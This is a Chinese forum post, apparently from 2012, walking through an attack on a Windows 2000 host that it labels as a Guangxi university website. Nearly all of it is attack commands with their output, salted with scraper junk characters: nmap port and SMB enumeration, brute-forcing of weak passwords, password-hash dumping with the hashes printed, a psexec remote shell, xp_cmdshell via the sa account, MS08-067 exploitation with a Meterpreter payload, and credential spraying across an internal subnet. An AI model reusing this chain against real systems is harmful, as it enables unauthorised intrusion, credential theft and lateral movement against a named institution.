广西师范网站http://202.103.242.241/
- w/ ^- |5 z# j! t( x" V. z! ^5 l0 N
root@bt:~# nmap -sS -sV 202.103.242.241" b' `8 ?: k4 {; r" v: e
1 D$ o, h9 y; \# x9 P: y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST& S Y+ U7 D e; e; r: L4 L; `
. @* P! N7 v' z# F) P9 ]
Nmap scan report for bogon (202.103.242.241)
& `1 b; |) ?+ ~3 Z$ B; O/ l+ o) W: S( z( [; ?, i
Host is up (0.00048s latency).
) o+ b2 C" u' A2 C( }; K
3 ]/ G2 I3 d2 f$ V. X2 \8 bNot shown: 993 closed ports
5 n" k8 B0 ^ w2 ]( T3 e1 Q# P. W. M4 n! V
PORT STATE SERVICE VERSION) X- a8 V b; V, B8 v# [# H
/ m# |$ |; \4 Z# J1 M135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
- A% w2 l5 B/ s1 l% N$ ]4 T' S* F' K# {% L" G4 U3 y# G
139/tcp open netbios-ssn
* m/ v4 a+ G" m6 i6 V$ C$ J1 @6 d' G( W
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds K m3 G8 w' b: Y
) u! M( J m0 P1 D D: ~
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe); K! W3 }5 I' w6 T4 ` ~
; _( H% z6 R7 o1 ^1026/tcp open msrpc Microsoft Windows RPC c7 m. [& D J, ^
, \# ]7 K2 o7 p: M: D# C' U
3372/tcp open msdtc?' k1 l% U3 b0 z0 B+ T- o9 X
1 m3 [( C; ]- m* e
3389/tcp open ms-term-serv?
8 @- ?. J, g3 C+ q) r
( z; g2 j; [( B1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
3 |% e8 ]7 M6 B4 O5 r/ T& lSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
# A) s3 B* d1 \ z5 ?* l7 n5 f; g; }% T, Y0 {7 _) ^
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions- ]" B* A; |+ Y$ K
5 c, |1 q; E" b+ I6 B9 L! z+ F) L4 zSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)8 Q0 y6 `, [5 w: M1 D0 M0 V
1 d, ^; m9 s2 t, n/ y( WSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO9 k! ^! e. l; ^0 ?( x/ m" Q
) w0 Y" Z8 g3 V& N! ASF:ptions,6,”hO\n\x000Z”);" V0 Z- }4 L* E; q% n
% `- s" |% Q8 K3 v3 z- bMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 O( L# l9 M- Z; W6 B- _
8 B1 P3 l; j+ m$ Z, Y5 IService Info: OS: Windows
3 x1 V2 m* m. u, X7 {" _7 Y( p1 e" c& ~: v; X2 g7 Y3 A
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# @1 t0 n% \$ y0 @+ W. t5 ]9 {& M% L
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds; V; w; u& V' I3 ~: @9 o- }) ~+ P
- o" t, ]0 Y6 j" K. D: ?$ Zroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本' `) {9 f; g( a7 n# u
$ o0 \ S; ]8 i- ~: C-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse! [) i& T( _! c
R" c5 W& P) n* p/ o3 a
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse. n$ f6 k& s/ W2 H* H: u* r5 V
: ^* Z$ X1 l- Y. B
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
M4 v# Z$ {: @' i/ ?5 R8 z3 O
9 w8 y% ?- P$ s) n( u/ H* H-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
9 O E& T# L# W
3 @8 }2 |' X+ Z( c-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse1 A8 b$ f3 u/ c0 ]6 u) O9 H
, E% z; y, I) u-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse6 I4 l9 L) ~4 B4 v6 E$ v/ I
) V9 F9 g6 o$ m-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse2 o' T3 t. T5 z
' ]2 l1 Y; F7 i ]-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
- ^$ B) f: E: C# g
- N4 y9 n, O0 _-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
9 w( n, X* D. p
- [; m) y1 V) E4 o-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
9 Q$ ]& L) c5 L) @* n( k6 v) y4 l4 W( S7 n& i
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse6 Y( l' l' Z* _: K9 y
/ T- l- _: p7 i0 O' t. Z) R& `' p
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
! @* d; M2 t; q0 t$ y
6 r' V0 S. _/ j, f-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
* I" g' x6 p; _9 _: G3 O
. s! ?( z: ^/ a3 s' |# L# R+ p-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
4 b/ J" @& L8 p5 n p% J9 U% ^
* d5 A& E- N8 Z: @: m* a" O1 d% E" ?; }-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
( k) ?" V7 d1 G
; K% X! z/ b8 m5 s. y: croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
/ C* z6 \9 b1 F3 _% {+ Q+ q
9 O8 X* {; Y* C8 V! J' H+ W//此乃使用脚本扫描远程机器所存在的账户名
+ s6 s r E& w4 t7 }# k/ W l3 ?- T
& e8 n2 W- K2 ?8 ^3 a* OStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
4 D, W% E0 g+ m7 a1 Z
7 @$ i3 K8 `$ `9 u2 C, u; a& XNmap scan report for bogon (202.103.242.241): I9 _& ^" r1 T% ]3 I' Q
8 a" w1 I6 _4 x; L* @9 eHost is up (0.00038s latency).
8 L" O9 N: \2 L" B5 d$ V9 f, R9 ~# t% w1 L6 d; V% L! Q# T! m
Not shown: 993 closed ports
/ K0 k; M4 y# a( \& X- E
$ L- p3 u: T# E( tPORT STATE SERVICE
3 j# _3 x S2 C- u
% D$ n, E9 B r1 g3 T! X135/tcp open msrpc
% B3 p3 g$ Q# P- ?- v; l
5 F" R1 d7 N) W' y139/tcp open netbios-ssn$ E7 S6 g& H/ D4 m" S0 ^7 ]* b
6 k$ P+ E0 J" Z5 s3 W2 |445/tcp open microsoft-ds
5 P0 r7 H" T1 ^; I$ @! s' N m+ J2 |: I1 [+ s
1025/tcp open NFS-or-IIS
$ j$ ~( B4 {: {
1 r5 T4 E4 h5 [3 |$ c+ k9 `1026/tcp open LSA-or-nterm3 U8 @: c8 U& k) B
. i1 ~' s) Q" W" R% c9 u/ c
3372/tcp open msdtc/ H7 h7 p+ D# R5 W
0 x# j9 M! E+ b* m7 Q( l2 `, X" P( e3389/tcp open ms-term-serv
, H/ y. u6 m, c g8 [% z
; \! L4 Z; e w( J( O- B9 TMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ ?. ~- ~( m3 Z( ?5 C5 P
: @! P7 ]. J9 a( k# \7 m6 y
Host script results:3 G2 |: c2 ?7 A5 h: m
2 T$ ]; Y/ v* J
| smb-enum-users:" ?8 o& w2 y, h( i. T4 H. I& J; n
! M) m5 i% q1 v|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
6 [# i4 H1 n5 ?' v b
1 ^# l0 B0 R# NNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
, E' v- |& V4 ^" ^$ H R5 N2 C
8 V: Y+ ^$ r1 x* L( o& }3 Iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 4 ]% f, j4 q) G8 ]7 v
, l8 `: Y) Z \4 `+ r. d7 i//查看共享
d, w* R5 q' ?7 J
- v4 A& v# S/ ?5 N. JStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
' F2 }9 \4 o6 q# G O1 Y+ c3 u" Q [( r9 e9 w
Nmap scan report for bogon (202.103.242.241)
o* x V) M; x
: d2 o0 j4 ]& \% p @; x: ~# |9 ?Host is up (0.00035s latency).$ z" c7 \2 [3 ?
9 z+ }1 A, @7 ~& ]- V+ G0 R5 f! G
Not shown: 993 closed ports
5 I8 Y: g: x% ]( s( b: s0 Y( I1 u% p' f1 E
PORT STATE SERVICE
/ q; ? r2 E& p% a) r/ F
5 w7 D# `- c% B5 k: B135/tcp open msrpc. q, @: b) e: k! L7 p8 u- O2 h+ j
3 B1 c3 C9 G/ N7 `
139/tcp open netbios-ssn
+ A, s. F+ K: Z: m7 I6 w, F; P: K( t
445/tcp open microsoft-ds
& o. ^0 A2 S% [
$ R( G, X( j2 w* U4 R& F1025/tcp open NFS-or-IIS& @0 }0 z6 D$ b. h1 P9 w; r
4 X8 {4 X8 U, @+ V( ?0 Z/ h1026/tcp open LSA-or-nterm# N' P+ Y% B& E/ S' B3 m
& W: J/ B: X. H3372/tcp open msdtc
0 r9 v0 _) ?" M, `% Q3 ^' a% s) B6 y/ X9 h y4 j
3389/tcp open ms-term-serv' N' Y; b$ a* G. ]& U' P. Y$ k
# g( Q4 \9 n5 ^& D6 g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 p! O8 d) y' F4 v( k9 [, u' `3 Q7 y) O
Host script results:
8 @" _2 L% @% D& F( a1 b T$ s: @' R+ p9 y* ~+ t! j7 Z
| smb-enum-shares:
( T3 m" ^! Z G5 }0 m% s7 F0 f" e: R" ^2 a
| ADMIN$
: N! I3 B9 c& {8 T! _# u w; ]( a9 H0 Q
| Anonymous access: <none>
3 s1 T5 C" F9 K& K+ q' j
1 A& k+ h( M& p| C$' M; {& \5 j0 q9 `0 ? p
; ?$ i, \. d, h1 l- K
| Anonymous access: <none>
) S3 d0 _# T/ \. i( s: |5 N
' F- K% a1 G1 l F( M. @| IPC$& H* Y1 V, I7 c. g, s$ [% y
$ z4 o& r+ s. Y|_ Anonymous access: READ
$ E1 L! ~3 _! E8 u h; `
9 w: l9 w* P3 M: b9 Z- ANmap done: 1 IP address (1 host up) scanned in 1.05 seconds
4 k+ ]# V( {7 i' {0 c) J3 s: X# E2 h4 V) a6 J# B
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 : J4 t6 Q" t5 n z6 o; a5 p8 ?
: N0 n2 i% p. G5 r
//获取用户密码; l, C/ ~" L6 @, Z
& S9 y) w0 O6 s' B
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST- n) l: ?! |; G& |; Y& V2 K/ a* a
0 v. i. q* N4 l; ~# ?; b
Nmap scan report for bogon (202.103.242.2418)
j' g; a! F' p1 Z1 R! O2 D
( l: d/ m5 P) x: K/ P' U+ d4 Q! ]Host is up (0.00041s latency).
- L8 l! J/ j& Z l/ { g3 S3 U" w5 t/ A4 P; H4 G/ Y8 m2 R7 p
Not shown: 993 closed ports
7 L8 @7 q! T7 R& Q& z2 d/ |5 Y3 A& u. q/ S" t
PORT STATE SERVICE. q- }" R# v( D; r( a7 y1 {- W8 P, a
* `9 R M3 F2 D! c% u" U
135/tcp open msrpc7 V# e# N b3 ]
0 X0 z5 h& I& v( x5 p. G& X
139/tcp open netbios-ssn
7 G# h: |8 q1 X& w6 B4 ~8 N' P1 ?5 y0 v: ]. _' q
445/tcp open microsoft-ds
% L2 v2 `5 h* R! U! ^+ ^# p3 g8 R1 O9 F& R- a7 _% V0 Z" F
1025/tcp open NFS-or-IIS$ T2 j4 @* ?9 E3 k! J
: G& X( q! W5 ~0 T. H0 e
1026/tcp open LSA-or-nterm
$ H; k" Q. Q% S* Q% R2 W* }, l4 W1 c$ ?0 H H
3372/tcp open msdtc, y p; ^3 x% F. g. U5 }
3 }: `- G& o0 y; X, i
3389/tcp open ms-term-serv$ A5 H& T, d: @! {( ~9 Z$ j
" z U$ D2 ]* H- B( Y: W
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ a, h) M+ S$ I8 e# w+ L5 d* f2 g
) f0 e' u; [ l; KHost script results:
7 s0 i* A: _- _! u0 J) X, J( j3 v, |6 w; r8 [; C( h* u) C
| smb-brute:& a3 K2 q1 f# p: ^
0 D* p8 J8 \3 X: \/ _7 b3 p
administrator:<blank> => Login was successful6 K b9 W1 a6 D3 W0 a/ L
1 I5 Q. i: q9 q
|_ test:123456 => Login was successful
" M! |; Y9 T m6 ?9 w$ }- F( X6 i5 x( F! p2 Y
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
1 @" h$ l/ |8 V2 K; R. h6 B/ j3 g+ n" r P
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash4 f) l# O9 n8 n: d* h
2 S% G4 H' o7 f' m" `) M5 k+ Eroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
! V e8 ]" z4 ]* C8 @" M6 @
7 [ { U7 v; d! z& N1 _# G& {root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
/ m A5 Y8 R5 F2 r/ G6 v8 k6 e% H" U$ D' _! ]' B, F
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139$ F9 Q8 J7 S7 G
0 P3 W3 [) J6 BStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
2 ]+ e7 x! H5 I0 g7 _# L
. e L {( _' `; U) W" a% \% e9 bNmap scan report for bogon (202.103.242.241)$ Y* A1 x2 S! |
& u7 C* s: ]& G, ~0 c5 G
Host is up (0.0012s latency).' D5 Q; I2 s! r% R
. _* _ l- I& E* d
PORT STATE SERVICE
1 ^5 A1 P8 l1 ]7 d! R2 l: f& ^
9 S+ a* I# J0 F/ @, U135/tcp open msrpc: B5 ]) [) W" O9 i0 G
$ ?" v* u% L) [, h( c, a
139/tcp open netbios-ssn; K& D$ J+ y6 Q2 L3 x5 f Z" m/ H" g
, E& ^9 P1 g8 k
445/tcp open microsoft-ds
; K4 E' ~* m. Y8 [8 [' k' M( |8 x# G E& I/ N$ J
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ }: X4 H/ t) C( c: L5 r2 \) K1 \. H' a
Host script results:
% L- ^8 K8 n' `
2 P. c' D7 H+ A% A& N| smb-pwdump:5 q' o8 S4 u5 D, e% Y$ ]$ T
3 E+ b, F1 m9 O
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************' l7 l$ s9 L* }3 R
) ?/ Y E" o' F v
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************2 E0 K% ~& A% _" o( ]: @# R8 \
4 E& X% d# {8 A! L
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, C# Q0 ^+ V& H( N, d
8 ~& o( \- v0 E8 C6 N|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2. e( F* J2 N: m
3 \) ?+ [4 r! d! j/ E6 W4 n+ lNmap done: 1 IP address (1 host up) scanned in 1.85 seconds B! ?; r) [% ^( a V; @, M
$ w% O5 ]$ |! d' A+ U+ i
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell H8 H2 b8 O3 ?6 x. b
& N4 S2 `6 B6 X/ k" X g( J
-p 123456 -e cmd.exe
3 E+ N d. w7 Z* ^1 O9 E2 M+ ^" A: N& i ?7 T: L0 v2 j
PsExec v1.55 – Execute processes remotely
+ h: C" I8 }1 c/ [7 c$ l' h/ O
9 d7 B' X; g9 e0 C( k, u: E7 v$ NCopyright (C) 2001-2004 Mark Russinovich
0 p4 o5 r( E# X$ O" h7 n7 k- ?$ ?5 s: Q
Sysinternals – www.sysinternals.com( H( V+ l6 i8 F7 N' A) g$ a- l
0 g2 G4 U* n* r# Y6 LMicrosoft Windows 2000 [Version 5.00.2195]
3 Z/ j: |- { }5 X9 `7 C1 H2 ~- l+ K
(C) 版权所有 1985-2000 Microsoft Corp.
) ~, l+ L; ~2 [. q2 w
: M9 V1 J6 e! _0 y! s1 SC:\WINNT\system32>ipconfig
% d2 I8 `4 C2 K- X4 I8 n4 [5 s4 P, O4 d. w0 x( ~* s1 u
Windows 2000 IP Configuration
0 A- h) N2 {: G2 @ `5 C
% h: \# V7 ?$ f1 MEthernet adapter 本地连接:- w9 Y" C2 k8 z i. @
9 z- d; m3 N: @' v* {6 H# c! MConnection-specific DNS Suffix . :& n6 d, O% K/ l0 t. u5 j* x
: T- F; w+ ^0 I
IP Address. . . . . . . . . . . . : 202.103.242.241& \" ~4 ~* a; \) @- C6 A8 C8 ?
" e$ i, Z) [6 P0 _. H: CSubnet Mask . . . . . . . . . . . : 255.255.255.07 c- o9 F2 g% ^, [! E) n& @2 M
' T2 L5 q$ L; K9 A: k4 f. wDefault Gateway . . . . . . . . . : 202.103.1.1
8 x, e& n! Q5 M, d8 _2 m3 J r6 i6 P, d4 z) X* N% s
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令; b0 o9 ~3 n% e1 h9 g- Q
; @+ L* N3 T( Q3 Z$ r1 W; Yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
$ c, }5 D' E/ h; _1 V5 `
; y; X. M( p% q [9 l' ~* zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
" z2 V; N( X* S4 o8 e" ~: O" `* L: L! x# `/ C/ x* r8 D! g
Nmap scan report for bogon (202.103.242.241)
- { M. C9 u0 ^# `9 B3 p0 a/ G
6 z, q5 a+ _0 B. g/ fHost is up (0.00046s latency).9 D9 ?- |: V' e) |& S: g# g) {7 p+ L
6 r" a5 M, {4 N3 z( L# i
Not shown: 993 closed ports& j r9 `* Y) S/ S5 q5 ~
" T6 l& \ H C8 o2 APORT STATE SERVICE
* Z/ V8 l/ d3 E& N% C; ^' ^5 U& T1 T
: y1 p! u- u u7 W6 B135/tcp open msrpc
% z# y+ k2 ]9 Y3 M" Q
D- \$ `% {. X" s K139/tcp open netbios-ssn4 S, O4 P; f4 I" R1 G
! C; b% [1 c5 l0 h4 @+ z! K! V1 p445/tcp open microsoft-ds0 g$ n8 t) Q# k; O! h# Z) b) B6 d
, y6 L" V& H3 p( P3 w1025/tcp open NFS-or-IIS
6 \: Y# g j/ L" M
+ W0 b& ?$ p7 r8 d1026/tcp open LSA-or-nterm8 f" X3 G: F/ Y
9 `% m! \* G2 j* h1 e3372/tcp open msdtc
5 s" T% f X4 g$ N% n
7 N) s! R+ {) o6 i1 t3389/tcp open ms-term-serv- q5 b* ]& W9 p' t8 P' S3 O
& i) r: p p2 `4 Q' S2 G+ V
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 h6 [8 U/ o! N8 h; M( h* s
9 Y# W% h; ?1 V5 \! E
Host script results:
( M6 A2 j4 C# z$ C0 K7 K6 b# ^6 _0 i* p
| smb-check-vulns:' H! H& J! |# e
; ?( v7 f" h/ \+ V
|_ MS08-067: VULNERABLE
+ T, R6 J3 b! |1 l" E- D) J. D5 v8 W9 v5 ]
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds2 w P0 I5 [5 B! o% R% X9 h# J
/ a' E( p9 j3 s3 U, m! ^1 broot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出% p% k$ w! P9 b G
, Z. R& m2 O3 Q/ h% c3 J' T; Xmsf > search ms08
0 |% u: ]0 G* c1 J0 d6 m
$ X1 t" l; V0 V, d" Q& r) Wmsf > use exploit/windows/smb/ms08_067_netapi
( ]' p% j3 X. ~3 Q; j! I2 d. a4 u1 | N7 P( O3 @& D
msf exploit(ms08_067_netapi) > show options7 Q& o: v% Q7 `- E6 v
: I* j2 A* B) |/ z
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
$ c1 t1 V$ [- a. S. _9 e/ B) p6 ~ ~& _5 Y: Y
msf exploit(ms08_067_netapi) > show payloads
2 X1 j3 E" W9 q
+ ^1 J/ L% f) bmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
3 R+ k, A8 q) Z% d3 }7 K
- u1 \& `( v/ g2 J- ]# N% vmsf exploit(ms08_067_netapi) > exploit
% C" q- I9 f R& a+ J
3 k( X d0 Z: ]meterpreter >
4 L( B) P0 n! B. c: x2 k
: ?- s% A& F$ \4 v- MBackground session 2? [y/N] (ctrl+z)
$ c: A% P! ~: g: r' M
- I8 Z! \' R6 O8 p! pmsf exploit(ms08_067_netapi) > sessions -l9 h; e5 r1 C, G' Z" I& X
# O$ r; x9 M: L- X1 Q
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt) \. t: B# o2 `! Y
! q9 A9 S7 F4 Y* Q; M3 K Stest1 _4 u, i8 T- e: X- z- i8 c! v1 q
' ~1 h/ x# V1 A
administrator
4 F( x9 a9 Z' |$ N. P$ _* ?: W* o: S, F5 p* V7 F- u% p1 \
root@bt:/usr/local/share/nmap/scripts# vim password.txt, B* X% d' i7 T1 H; \& C
4 a9 P3 L8 G& @1 f O9 f' A44EFCE164AB921CAAAD3B435B51404EE
/ x& O- \& @4 w3 ?& h* k+ A6 g1 n4 A# E" c; a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
% S, Y/ Y$ o5 W5 b- [5 Y+ I7 @( W5 B8 u
//利用用户名跟获取的hash尝试对整段内网进行登录. c$ g/ @! w: y4 x) v3 D$ s
J; ^+ L k7 X, oNmap scan report for 192.168.1.105
" j. r5 |2 g6 |% `3 x, X) Z; U# \' @) H: g# ?
Host is up (0.00088s latency).
% _8 A/ I8 `" r, _
! z( ]/ ~, W( }: y) V ENot shown: 993 closed ports
2 A1 K4 X3 p$ G4 O% ~" u; D" ]! ~
/ S# q/ U* d6 J0 v( }* VPORT STATE SERVICE6 M/ _" G3 t! k/ q) S
% r0 s, Y3 J; }: {2 G
135/tcp open msrpc
7 p. ~6 y7 Y X. N4 J& {0 J
: S- [2 V6 e; d% o$ b139/tcp open netbios-ssn9 b( {# c' b8 g
4 ~- G# v+ h4 i. M/ z) x) |2 o445/tcp open microsoft-ds. Z" ?4 P/ k- t
5 f3 R, Y. E6 {9 u$ y, o/ {- m1025/tcp open NFS-or-IIS
. r$ _- v3 b" O! _) T
8 K r S( R0 c1026/tcp open LSA-or-nterm C* `% J/ y8 b: g7 j2 K' l) V* _
$ E, u8 k* G/ j M
3372/tcp open msdtc
- D" K" B1 s' e1 {2 N3 I. [9 x% J; w3 r" S0 B2 \2 B& Y& B1 Z
3389/tcp open ms-term-serv
y1 T% z2 c7 ~2 a$ ]" @ e* _, ^4 U- R$ s
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* @& _: `# C J
( G b* G& N) j% hHost script results:
H9 m# k( t# ~7 j& O9 [7 w. e4 V( p
| smb-brute:
6 }6 g/ H3 s/ b+ a9 i1 }9 O R* b2 f
|_ administrator:<blank> => Login was successful' e( X6 V) o; k% \* ]8 V
# Z4 ]& B; t8 Y% t5 f$ C6 Y [攻击成功,一个简单的msf+nmap攻击~~·) u9 o9 |5 Y& A, b3 E( w" c
$ E% I- s6 b" ~; u
|
发表于 2012-12-4 12:46:42
收藏
支持
反对